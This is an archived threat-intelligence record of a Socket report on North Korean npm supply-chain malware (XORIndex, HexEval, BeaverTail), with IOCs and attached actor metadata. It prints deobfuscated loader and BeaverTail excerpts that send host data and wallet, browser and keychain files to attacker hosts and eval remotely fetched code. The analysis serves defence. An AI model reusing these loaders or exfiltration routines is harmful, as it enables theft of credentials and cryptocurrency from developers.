{
	"id": "86aabe16-2e2f-4d7d-90bf-9318bf93d73b",
	"created_at": "2026-04-06T00:13:55.076472Z",
	"updated_at": "2026-04-10T03:36:48.381561Z",
	"deleted_at": null,
	"sha1_hash": "d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e",
	"title": "Contagious Interview Campaign Escalates With 67 Malicious np...",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1364993,
	"plain_text": "Contagious Interview Campaign Escalates With 67 Malicious np...\r\nArchived: 2026-04-05 16:58:03 UTC\r\nThe Socket Threat Research Team has uncovered a new North Korean software supply chain attack involving a previously unreported malware loader we call XORIndex. This activity is an expansion of the campaign we reported in June 2025, which deployed the HexEval Loader. In this latest wave, the North Korean threat actors behind the Contagious Interview operation infiltrated the npm ecosystem with 67 malicious packages, collectively downloaded more than 17,000 times. 27 of these packages remain live on the npm registry. We have submitted takedown requests to the npm security team and petitioned for the suspension of the associated accounts.\r\nhttps://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages\r\nPage 1 of 16\n\nThe full list of packages is provided in the IOCs section of this report. Based on current patterns, we assess that additional packages tied to the XORIndex and HexEval Loader campaigns are likely to surface. The Contagious Interview operation continues to follow a whack-a-mole dynamic, where defenders detect and report malicious packages, and North Korean threat actors quickly respond by uploading new variants using the same, similar, or slightly evolved playbooks.\r\nThe HexEval Loader campaign shows no signs of slowing down, as the threat actors continue uploading malicious packages to the npm registry. 
With the emergence of the XORIndex Loader (named for its use of XOR-encoded strings and index-based obfuscation), they have expanded their tooling with a new loader, also designed to evade detection.\r\nAs in the HexEval campaign, the XORIndex Loader collects host metadata, decodes its follow-on script, and, when triggered, fetches and executes BeaverTail — the staple second-stage malware in the North Korean Contagious Interview threat actors’ arsenal. BeaverTail, in turn, references InvisibleFerret, a known third-stage backdoor linked to this operation.\r\nThe two campaigns now operate in parallel. XORIndex has accumulated over 9,000 downloads in a short window (June to July 2025), while HexEval continues at a steady pace, with more than 8,000 additional downloads across the newly discovered packages.\r\nWe expect the North Korean threat actors to reuse existing loaders like HexEval and XORIndex, while introducing new obfuscation techniques and loader variants. Their focus remains on infiltrating software supply chains and targeting developers, job seekers, and individuals they believe possess cryptocurrency or sensitive credentials. As our previous reporting shows, these well-resourced, financially motivated, and state-backed threat actors do not hesitate to target smaller organizations and individuals.\r\nTimeline of HexEval and XORIndex Loader campaigns showing parallel waves of malicious npm package deployments by North Korean threat actors from April to July 2025. 
This latest wave includes 67 previously unreported packages: 39 new HexEval Loader and 28 XORIndex Loader packages.\r\nEarlier waves: 4 packages in April 2025 and 35 in June 2025 were detailed in our prior research.\r\nXORIndex Loader\r\nIn the XORIndex Loader campaign, we identified 28 malicious npm packages distributed across 18 npm accounts registered using 15 distinct email addresses. Consistent with the HexEval Loader campaign, the malware relies on hardcoded command and control (C2) infrastructure delivering the /api/ipcheck callback. The five known endpoints include:\r\n1. https://soc-log[.]vercel[.]app/api/ipcheck\r\n2. https://1215[.]vercel[.]app/api/ipcheck\r\n3. https://log-writter[.]vercel[.]app/api/ipcheck\r\n4. https://process-log-update[.]vercel[.]app/api/ipcheck\r\n5. https://api[.]npoint[.]io/1f901a22daea7694face (a likely initial configuration fetch).\r\nPackage-naming patterns (e.g., vite-*, *-log*), the presence of BeaverTail malware, and references to the InvisibleFerret backdoor link the XORIndex campaign to earlier Contagious Interview operations we previously documented.\r\nThe following commented excerpt from the deobfuscated eth-auditlog package demonstrates a typical instance of the XORIndex Loader.\r\n// Dependencies and utilities\r\nconst axios = require(\"axios\");\r\nconst os = require(\"os\");\r\nconst publicIp = (await import(\"public-ip\")).default;\r\n// XOR-decode function for obfuscated strings (simplified)\r\nfunction xorDecode(hexStr) { /* … */ }\r\n// Collects local telemetry (host/user/IP/geo/platform)\r\nasync function gatherInfo() {\r\n const ip = await publicIp.v4(); // External IP\r\n const geo = (await axios.get(`http://ip-api.com/json/${ip}`)).data;\r\n return {\r\n host: os.hostname(), // System hostname\r\n user: os.userInfo().username, // Current OS username\r\n ip,\r\n location: geo, // Geolocation metadata\r\n platform: os.platform() // OS identifier\r\n 
};\r\n}\r\n// Sends beacon and executes threat actor-supplied JavaScript payloads\r\nmodule.exports = async function writer() {\r\n const info = await gatherInfo();\r\n const version = process.env.npm_package_version;\r\n // POST telemetry to C2 endpoint (defanged) and execute returned payloads\r\n axios.post(\"https://log-writter[.]vercel[.]app/api/ipcheck\",\r\n { ...info, version })\r\n .then(res =\u003e {\r\n eval(res.data.s1); // Execute primary threat actor's payload\r\n eval(res.data.s2); // Execute optional secondary payload\r\n })\r\n .catch(() =\u003e console.log(\"write f callback error\"));\r\n};\r\nUpon installation, eth-auditlog collects local host telemetry, including hostname, current username, OS type, external IP address, basic geolocation, and the package’s version, then exfiltrates this data to a hardcoded C2 endpoint (https://log-writter[.]vercel[.]app/api/ipcheck). It subsequently executes arbitrary JavaScript code via eval(), loading the second-stage malware BeaverTail, which contains references to the third-stage backdoor InvisibleFerret. The malicious code is platform-agnostic, functioning across Windows, macOS, and Linux, but specifically targets the Node.js ecosystem, primarily developers installing npm packages.\r\nBeaverTail\r\nThe second-stage malware delivered by the XORIndex Loader via the eth-auditlog package is BeaverTail — the hallmark payload of the North Korean Contagious Interview operations. It scans for dozens of known desktop wallet directories and browser extension paths, archives the collected data, and exfiltrates it to a hardcoded IP-based HTTP endpoint. Several string constants in the code match wallet and extension identifiers previously attributed to BeaverTail. 
BeaverTail downloads additional payloads, such as the InvisibleFerret backdoor, using filenames like p.zi or p2.zip.\r\nThe following deobfuscated, defanged, and commented excerpt illustrates the BeaverTail second-stage malware that is executed after installation of the eth-auditlog package.\r\n// Wallet / Key store targets\r\nconst WALLET_IDS = [\r\n 'nkbihfbeog', // MetaMask browser extension ID\r\n 'iijedngplf', // Coinbase Wallet extension ID\r\n 'cgndfolcbk', // Phantom (Chrome) extension ID\r\n 'bohpjbbldc', // TronLink extension ID\r\n // …46 more IDs …\r\n];\r\nconst FILE_PATTERNS = [\r\n '/Library/Application Support/Exodus/', // Exodus wallet config\r\n '/Library/Application Support/BraveSoftware/', // Brave browser profiles\r\n '/.config/solana/solana_id.json', // Solana CLI keypair\r\n 'Login.keychain', // macOS system keychain file\r\n // …\r\n];\r\n// File collection and exfiltration\r\nfunction harvest() { // Primary execution routine\r\n const tmpZip = path.join(os.tmpdir(), 'p2.zip');\r\n const zip = new AdmZip(); // Dependency for archiving\r\n scanAndAdd(zip, WALLET_IDS, FILE_PATTERNS); // Search and match files\r\n zip.writeZip(tmpZip);\r\n // Exfiltrate collected archive via HTTP POST\r\n return axios.post('http://144[.]217[.]86[.]88/uploads', // Hardcoded C2\r\n fs.createReadStream(tmpZip),\r\n { headers: { 'Content-Type': 'application/zip' } });\r\n}\r\n// Optional payload fetch and execution\r\naxios.get('http://144[.]217[.]86[.]88/download') // Fetch remote payload\r\n .then(r =\u003e Function(r.data)()) // Execute via Function\r\nThe malware enumerates nearly 50 wallet paths (e.g. Exodus, MetaMask, Phantom, Keplr, and TronLink) and inspects user profiles for Chromium- and Gecko-based browsers (Brave, Chrome, Firefox, Opera, Edge) to locate extension storage directories. 
It searches for sensitive files such as *.ldb, RTCDataChannel, keychain-db, and seed files matching *.json patterns. Collected data is archived into p2.zip using the embedded adm-zip module and written to the system’s temporary directory. The archive is exfiltrated via HTTP POST to http://144[.]217[.]86[.]88/uploads. Exfiltrated contents include wallet databases, browser extension local storage, macOS keychain credentials, Solana IDs, and wallet-related JSON files. On successful upload, the archive is deleted. The malware then attempts to fetch third-stage malware from the same host and executes it in memory using Function(). This behavior aligns with the established BeaverTail to InvisibleFerret execution chain.\r\nXORIndex Loader Evolution\r\npostcss-preloader — First-Generation XORIndex Loader\r\nWe identified earlier variants of the XORIndex Loader likely used for testing, which lacked obfuscation and offered limited or no host reconnaissance capabilities. One such example is postcss-preloader — an aptly named loader prototype.\r\nDuring installation, postcss-preloader silently contacts a hardcoded C2 endpoint and executes any JavaScript code returned by the server. Unlike later XORIndex Loader variants, it omits string obfuscation, host metadata collection, and endpoint rotation. 
Yet, it still provides the threat actors with full remote code execution, highlighting the foundational capabilities of this malware loader.\r\nThe following commented and defanged excerpt from the postcss-preloader package demonstrates the first prototype version of the XORIndex Loader.\r\n\"use strict\";\r\nconst axios = require(\"axios\"); // Sends HTTP requests\r\nconst os = require(\"os\"); // Unused (likely decoy)\r\nrequire(\"dotenv\").config(); // Loads .env (optional)\r\n// Postinstall callback\r\nconst writer = async () =\u003e {\r\n try {\r\n const version = process.env.npm_package_version;\r\n // Beacon to threat actor's C2\r\n axios\r\n .post(\"https://soc-log[.]vercel[.]app/api/ipcheck\", { version })\r\n .then((r) =\u003e {\r\n eval(r.data.model); // Executes server-sent JS code\r\n });\r\n } catch (error) {\r\n // Silent fail\r\n }\r\n};\r\nmodule.exports = writer; // Auto-invoked postinstall entry\r\njs-log-print — Second-Generation XORIndex Loader\r\njs-log-print retains the same basic post-install remote code execution behavior as the initial postcss-preloader version but introduces rudimentary host reconnaissance, attempting to collect the hostname, username, external IP, geolocation, and OS type. However, due to a bug in the external IP retrieval logic, the ip and location fields are typically undefined or null. 
Unlike the fully developed XORIndex loader, it lacks string obfuscation and multi-endpoint rotation.\r\nThe following commented and defanged excerpt from the js-log-print package demonstrates a transitional stage of the XORIndex Loader.\r\n\"use strict\";\r\nconst axios = require(\"axios\"); // HTTP client for API calls\r\nconst os = require(\"os\"); // Access to system info\r\nrequire(\"dotenv\").config(); // Load environment variables\r\n// Attempts to get external IP (BUG: returns nothing)\r\nasync function geuicp() {\r\n const publicIp = await import(\"public-ip\");\r\n const ip = await publicIp.publicIpv4(); // IP fetched but never returned\r\n}\r\n// Collects system telemetry\r\nasync function genfo() {\r\n try {\r\n const hoame = os.hostname(); // Hostname\r\n const uame = os.userInfo().username; // Username\r\n const ip = await geuicp(); // External IP (fails)\r\n const location = await getP(ip); // Country\r\n const sype = os.type(); // OS type\r\n return { hoame, ip, location, uame, sype };\r\n } catch (error) {}\r\n}\r\n// Performs IP geolocation lookup\r\nasync function getP(ip) {\r\n try {\r\n const response = await axios.get(`https://ipapi.co/${ip}/json/`);\r\n return response.data.country_name;\r\n } catch (error) {\r\n return null;\r\n }\r\n}\r\n// Sends host data to C2 and executes returned code\r\nconst writer = async () =\u003e {\r\n try {\r\n const synfo = await genfo(); // Gather system data\r\n const version = process.env.npm_package_version; // npm package version\r\n axios\r\n .post(\"https://log-writter[.]vercel[.]app/api/ipcheck\", { ...synfo, version })\r\n .then((r) =\u003e {\r\n eval(r.data.model); // Execute threat actor's code\r\n });\r\n } catch (error) {}\r\n};\r\nmodule.exports = writer; // Exported as 
postinstall entry\r\ndev-filterjs — Third-Generation XORIndex Loader\r\ndev-filterjs introduces the threat actors’ first use of string-level obfuscation (ASCII buffer decoded via TextDecoder) while retaining the same post-install beacon-and-eval pattern. Reconnaissance logic from the second prototype remains and now successfully transmits the external IP and country data.\r\nThe following commented and defanged excerpt from the dev-filterjs package demonstrates the first use of string-level obfuscation in the XORIndex Loader.\r\n\"use strict\";\r\nconst axios = require(\"axios\");\r\nconst os = require(\"os\");\r\nrequire('dotenv').config(); // Load environment variables\r\n// Returns external IP (used for geo lookup)\r\nasync function geuicp() {\r\n const publicIp = await import('public-ip');\r\n return publicIp.publicIpv4();\r\n}\r\n// Collects basic system telemetry\r\nasync function genfo() {\r\n try {\r\n const hoame = os.hostname(); // Hostname\r\n const uame = os.userInfo().username; // Username\r\n const ip = await geuicp(); // External IP\r\n const location = await getP(ip); // Country name\r\n const sype = os.type(); // OS type\r\n return { hoame, ip, location, uame, sype };\r\n } catch (error) {\r\n console.error('Error collecting telemetry:', error);\r\n throw error;\r\n }\r\n}\r\n// Maps IP to country using ipapi.co\r\nasync function getP(ip) {\r\n try {\r\n const response = await axios.get(`https://ipapi.co/${ip}/json/`);\r\n return response.data.country_name;\r\n } catch (error) {\r\n console.error('Geo lookup failed:', error.message);\r\n return null;\r\n }\r\n}\r\n// Main loader logic (runs automatically post-install)\r\n(async () =\u003e {\r\n try {\r\n // Decode hardcoded C2 URL\r\n const uint8Array = new Uint8Array([\r\n 104, 116, 116, 112, 115, 58, 47, 47, 108, 111, 103, 45, 119, 114, 105, 116,\r\n 116, 101, 114, 46, 118, 101, 
114, 99, 101, 108, 46, 97, 112, 112, 47, 97,\r\n 112, 105, 47, 105, 112, 99, 104, 101, 99, 107\r\n ]);\r\n const decodeURL = new TextDecoder().decode(uint8Array);\r\n const version = \"0.3.2\";\r\n const synfo = await genfo(); // Gather telemetry\r\n // Send beacon to C2 and execute returned JS payload\r\n axios.post(decodeURL, { ...synfo, version })\r\n .then((r) =\u003e {\r\n eval(r.data.model); // Execute threat actor-supplied code\r\n });\r\n } catch (error) {\r\n // Silently fail\r\n }\r\n})();\r\n// Exported only for reuse/debug purposes\r\nmodule.exports = genfo;\r\nThe XORIndex Loader exhibits a deliberate and rapid evolution from proof-of-concept to fully featured malware loader. The initial postcss-preloader was a bare-bones remote code execution loader with no obfuscation or host profiling. The second prototype, js-log-print, introduced rudimentary reconnaissance capabilities, though it remained unobfuscated. The third iteration, dev-filterjs, marked the threat actors’ first use of string obfuscation via ASCII buffers and TextDecoder. In contrast, the latest XORIndex Loader variants incorporate XOR-based string hiding, multi-endpoint C2 rotation, host profiling, and dual eval() execution paths. 
Across all versions, the threat actors consistently reuse a shared C2 infrastructure hosted on Vercel under the /api/ipcheck path.\r\nThis progression reflects the North Korean Contagious Interview threat actors’ ongoing investment in stealthier, more resilient software supply chain malware, moving from simple prototypes to modular loaders capable of full system compromise.\r\nSocket’s AI scanner includes contextual analysis of the latest XORIndex Loader variant found in the malicious cronek package.\r\nSocket’s view of the obfuscated code in the cronek package.\r\nOutlook and Recommendations\r\nContagious Interview threat actors will continue to diversify their malware portfolio, rotating through new npm maintainer aliases, reusing loaders such as HexEval Loader and malware families like BeaverTail and InvisibleFerret, and actively deploying newly observed variants including XORIndex Loader.\r\nDefenders should expect continued iterations of these loaders across newly published packages, often with slight variations to evade detection. The threat actors’ consistent use of legitimate infrastructure providers like Vercel for C2 lowers operational overhead and may influence similar adoption by other APTs or cybercriminal groups. Evasive methods such as memory-only execution and obfuscation will likely increase, complicating detection and incident response.\r\nSecurity teams should treat these incidents as persistent, evolving threats. Developers, particularly those in DevOps, open source, or infrastructure engineering roles, remain prime targets due to their elevated access and trust within the ecosystem. 
Proactive supply chain defense must become a standard part of secure software development.\r\nSocket equips organizations to defend against this evolving threat. The Socket GitHub App enables real-time pull request scanning to catch malicious dependencies before they are merged. The Socket CLI flags suspicious behavior during npm install, giving immediate visibility into risk. And the Socket browser extension adds security metrics to package pages and search results, helping users identify threats in open source packages before installation.\r\nIndicators of Compromise (IOCs)\r\nMalicious npm Packages With XORIndex Loader\r\n1. vite-meta-plugin (live at time of publication; removal requested)\r\n2. vite-postcss-tools (live at time of publication; removal requested)\r\n3. pretty-chalk (live at time of publication; removal requested)\r\n4. vite-usageit (live at time of publication; removal requested)\r\n5. ecom-config (live at time of publication; removal requested)\r\n6. flowframe (live at time of publication; removal requested)\r\n7. proc-logger (live at time of publication; removal requested)\r\n8. vite-log-handler (live at time of publication; removal requested)\r\n9. cronek (live at time of publication; removal requested)\r\n10. vite-proc-log (live at time of publication; removal requested)\r\n11. vite-plugin-enhance\r\n12. postcss-preloader\r\n13. vite-logify\r\n14. js-log-print\r\n15. vite-logging-tool\r\n16. dev-filterjs\r\n17. eth-auditlog\r\n18. midd-js\r\n19. flowmark\r\n20. vitejs-log\r\n21. utx-config\r\n22. figwrap\r\n23. springboot-js\r\n24. springboot-md\r\n25. 1imit\r\n26. phlib-config\r\n27. middy-js\r\n28. vite-tsconfig-log\r\nnpm Aliases\r\n1. h96452582\r\n2. devin-ta39\r\n3. csilvagalaxy\r\n4. alisson_dev\r\n5. dmytryi\r\n6. drgru\r\n7. ahmadbahai\r\n8. stefanofrick2\r\n9. samuelhuggins\r\n10. jgod19960520\r\n11. 
monster1117\r\n12. marilin\r\n13. jasonharry1988\r\n14. davidmoberly\r\n15. vitalii0021\r\n16. rory210\r\n17. jasonharry198852\r\n18. millos\r\nEmail Addresses\r\n1. h96452582@gmail[.]com\r\n2. devin.s@gedu[.]demo[.]ta-39[.]com\r\n3. csilvagalaxy87@gmail[.]com\r\n4. souzaporto800@gmail[.]com\r\n5. dmytroputko@gmail[.]com\r\n6. drgru854@gmail[.]com\r\n7. ahmadbahai07@gmail[.]com\r\n8. stefanofrick2@gmail[.]com\r\n9. samuelhuggins3@gmail[.]com\r\n10. jgod19960520@outlook[.]com\r\n11. filip.porter9017@outlook[.]com\r\n12. r29728098@gmail[.]com\r\n13. vitalii214.ilnytskyi@gmail[.]com\r\n14. jasonharry198852@gmail[.]com\r\n15. millosmike3@gmail[.]com\r\nMalicious npm Packages With HexEval Loader\r\n1. nextjs-https-supertest (live at time of publication; removal requested)\r\n2. nextjs-package-purify (live at time of publication; removal requested)\r\n3. jsonslicer (live at time of publication; removal requested)\r\n4. node-mongo-orm (live at time of publication; removal requested)\r\n5. parsing-query (live at time of publication; removal requested)\r\n6. tailwind-config-plugin (live at time of publication; removal requested)\r\n7. nodestream-log (live at time of publication; removal requested)\r\n8. vite-lightparse (live at time of publication; removal requested)\r\n9. pino-req (live at time of publication; removal requested)\r\n10. tailwind-base-theme (live at time of publication; removal requested)\r\n11. js-prettier (live at time of publication; removal requested)\r\n12. notifier-loggers (live at time of publication; removal requested)\r\n13. querypilot (live at time of publication; removal requested)\r\n14. vitejs-plugin-refresh (live at time of publication; removal requested)\r\n15. jsonlis-conf (live at time of publication; removal requested)\r\n16. node-mongodb-logger (live at time of publication; removal requested)\r\n17. jsonloggers\r\n18. 
async-queuelite\r\n19. node-mongoose-orm\r\n20. jsonwebstr\r\n21. parser-query\r\n22. node-log-streamer\r\n23. jsonli-conf\r\n24. notification-loggers\r\n25. notification-logs\r\n26. logs-bind\r\n27. jsons-pack\r\n28. reqweaver\r\n29. servula\r\n30. reqnexus\r\n31. velocky\r\n32. flush-plugins\r\n33. jsonlogs\r\n34. jsontostr\r\n35. husky-logger\r\n36. node-mongodb-orm\r\n37. jsonskipy\r\n38. restpilot\r\n39. jsonspack-logger\r\nnpm Aliases\r\n1. denniswinter\r\n2. magalhaesbruno236\r\n3. backsonblau\r\n4. jinping\r\n5. rodolfo010813\r\n6. david262721\r\n7. christacole\r\n8. oleksandr522\r\n9. hera0204\r\n10. hamid1997\r\n11. kingxianstar\r\n12. daphneyrath\r\n13. garner_dev\r\n14. alex.c11\r\n15. dan436\r\n16. jennyjenkins\r\n17. david36271\r\n18. yoga001\r\n19. astro847\r\n20. stardev47\r\n21. ahmedays\r\n22. devcrimson\r\n23. derek00144\r\n24. devin1571\r\n25. stormdev0418\r\n26. jinping0822\r\n27. davisjosephinewnk\r\n28. jaksonas11\r\n29. liamnevin\r\nEmail Addresses\r\n1. denniswinter727@outlook[.]com\r\n2. magalhaesbruno236@gmail[.]com\r\n3. jacksonblau11ai@gmail[.]com\r\n4. jinping0821@outlook[.]com\r\n5. rodolfguerr@gmail[.]com\r\n6. david262721@outlook[.]com\r\n7. chulovskaolena@outlook[.]com\r\n8. oleksandrkazadaiev522@gmail[.]com\r\n9. hera19970204@outlook[.]com\r\n10. zeus19970204@outlook[.]com\r\n11. imanwdr30@hotmail[.]com\r\n12. scarlet112603@outlook[.]com\r\n13. garnerbrandy1230@gmail[.]com\r\n14. alexandercruciata11@gmail[.]com\r\n15. danxeth436@gmail[.]com\r\n16. jennyjenkins783@gmail[.]com\r\n17. david36271@outlook[.]com\r\n18. rkupriyanof@gmail[.]com\r\n19. vallierhilaire@gmail[.]com\r\n20. willsuccess47@gmail[.]com\r\n21. ahmedali06091@gmail[.]com\r\n22. c258789456@gmail[.]com\r\n23. derek00144@gmail[.]com\r\n24. 
devin1571@outlook[.]com\r\n25. star712418@gmail[.]com\r\n26. jinping0822@outlook[.]com\r\n27. davisjosephinewnk807@outlook[.]com\r\n28. jaksonas11@outlook[.]com\r\n29. hades19910712@outlook[.]com\r\nCommand and Control (C2) Endpoints\r\n1. https://soc-log[.]vercel[.]app/api/ipcheck\r\n2. https://1215[.]vercel[.]app/api/ipcheck\r\n3. https://log-writter[.]vercel[.]app/api/ipcheck\r\n4. https://process-log-update[.]vercel[.]app/api/ipcheck\r\n5. https://api[.]npoint[.]io/1f901a22daea7694face\r\n6. 144[.]217[.]86[.]88\r\nMITRE ATT\u0026CK Techniques\r\nT1195.002 — Supply Chain Compromise: Compromise Software Supply Chain\r\nT1608.001 — Stage Capabilities: Upload Malware\r\nT1204.002 — User Execution: Malicious File\r\nT1059.007 — Command and Scripting Interpreter: JavaScript\r\nT1027.013 — Obfuscated Files or Information: Encrypted/Encoded File\r\nT1546.016 — Event Triggered Execution: Installer Packages\r\nT1005 — Data from Local System\r\nT1082 — System Information Discovery\r\nT1083 — File and Directory Discovery\r\nT1217 — Browser Information Discovery\r\nT1555.003 — Credentials from Password Stores: Credentials from Web Browsers\r\nT1555.001 — Credentials from Password Stores: Keychain\r\nT1041 — Exfiltration Over C2 Channel\r\nT1105 — Ingress Tool Transfer\r\nT1119 — Automated Collection\r\nT1657 — Financial Theft\r\nSource: https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://socket.dev/blog/contagious-interview-campaign-escalates-67-malicious-npm-packages"
	],
	"report_names": [
		"contagious-interview-campaign-escalates-67-malicious-npm-packages"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434435,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e.pdf",
		"text": "https://archive.orkl.eu/d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e.txt",
		"img": "https://archive.orkl.eu/d7824e7fe8cfc6dea776a75f4c7ce0e70ab9e41e.jpg"
	}
}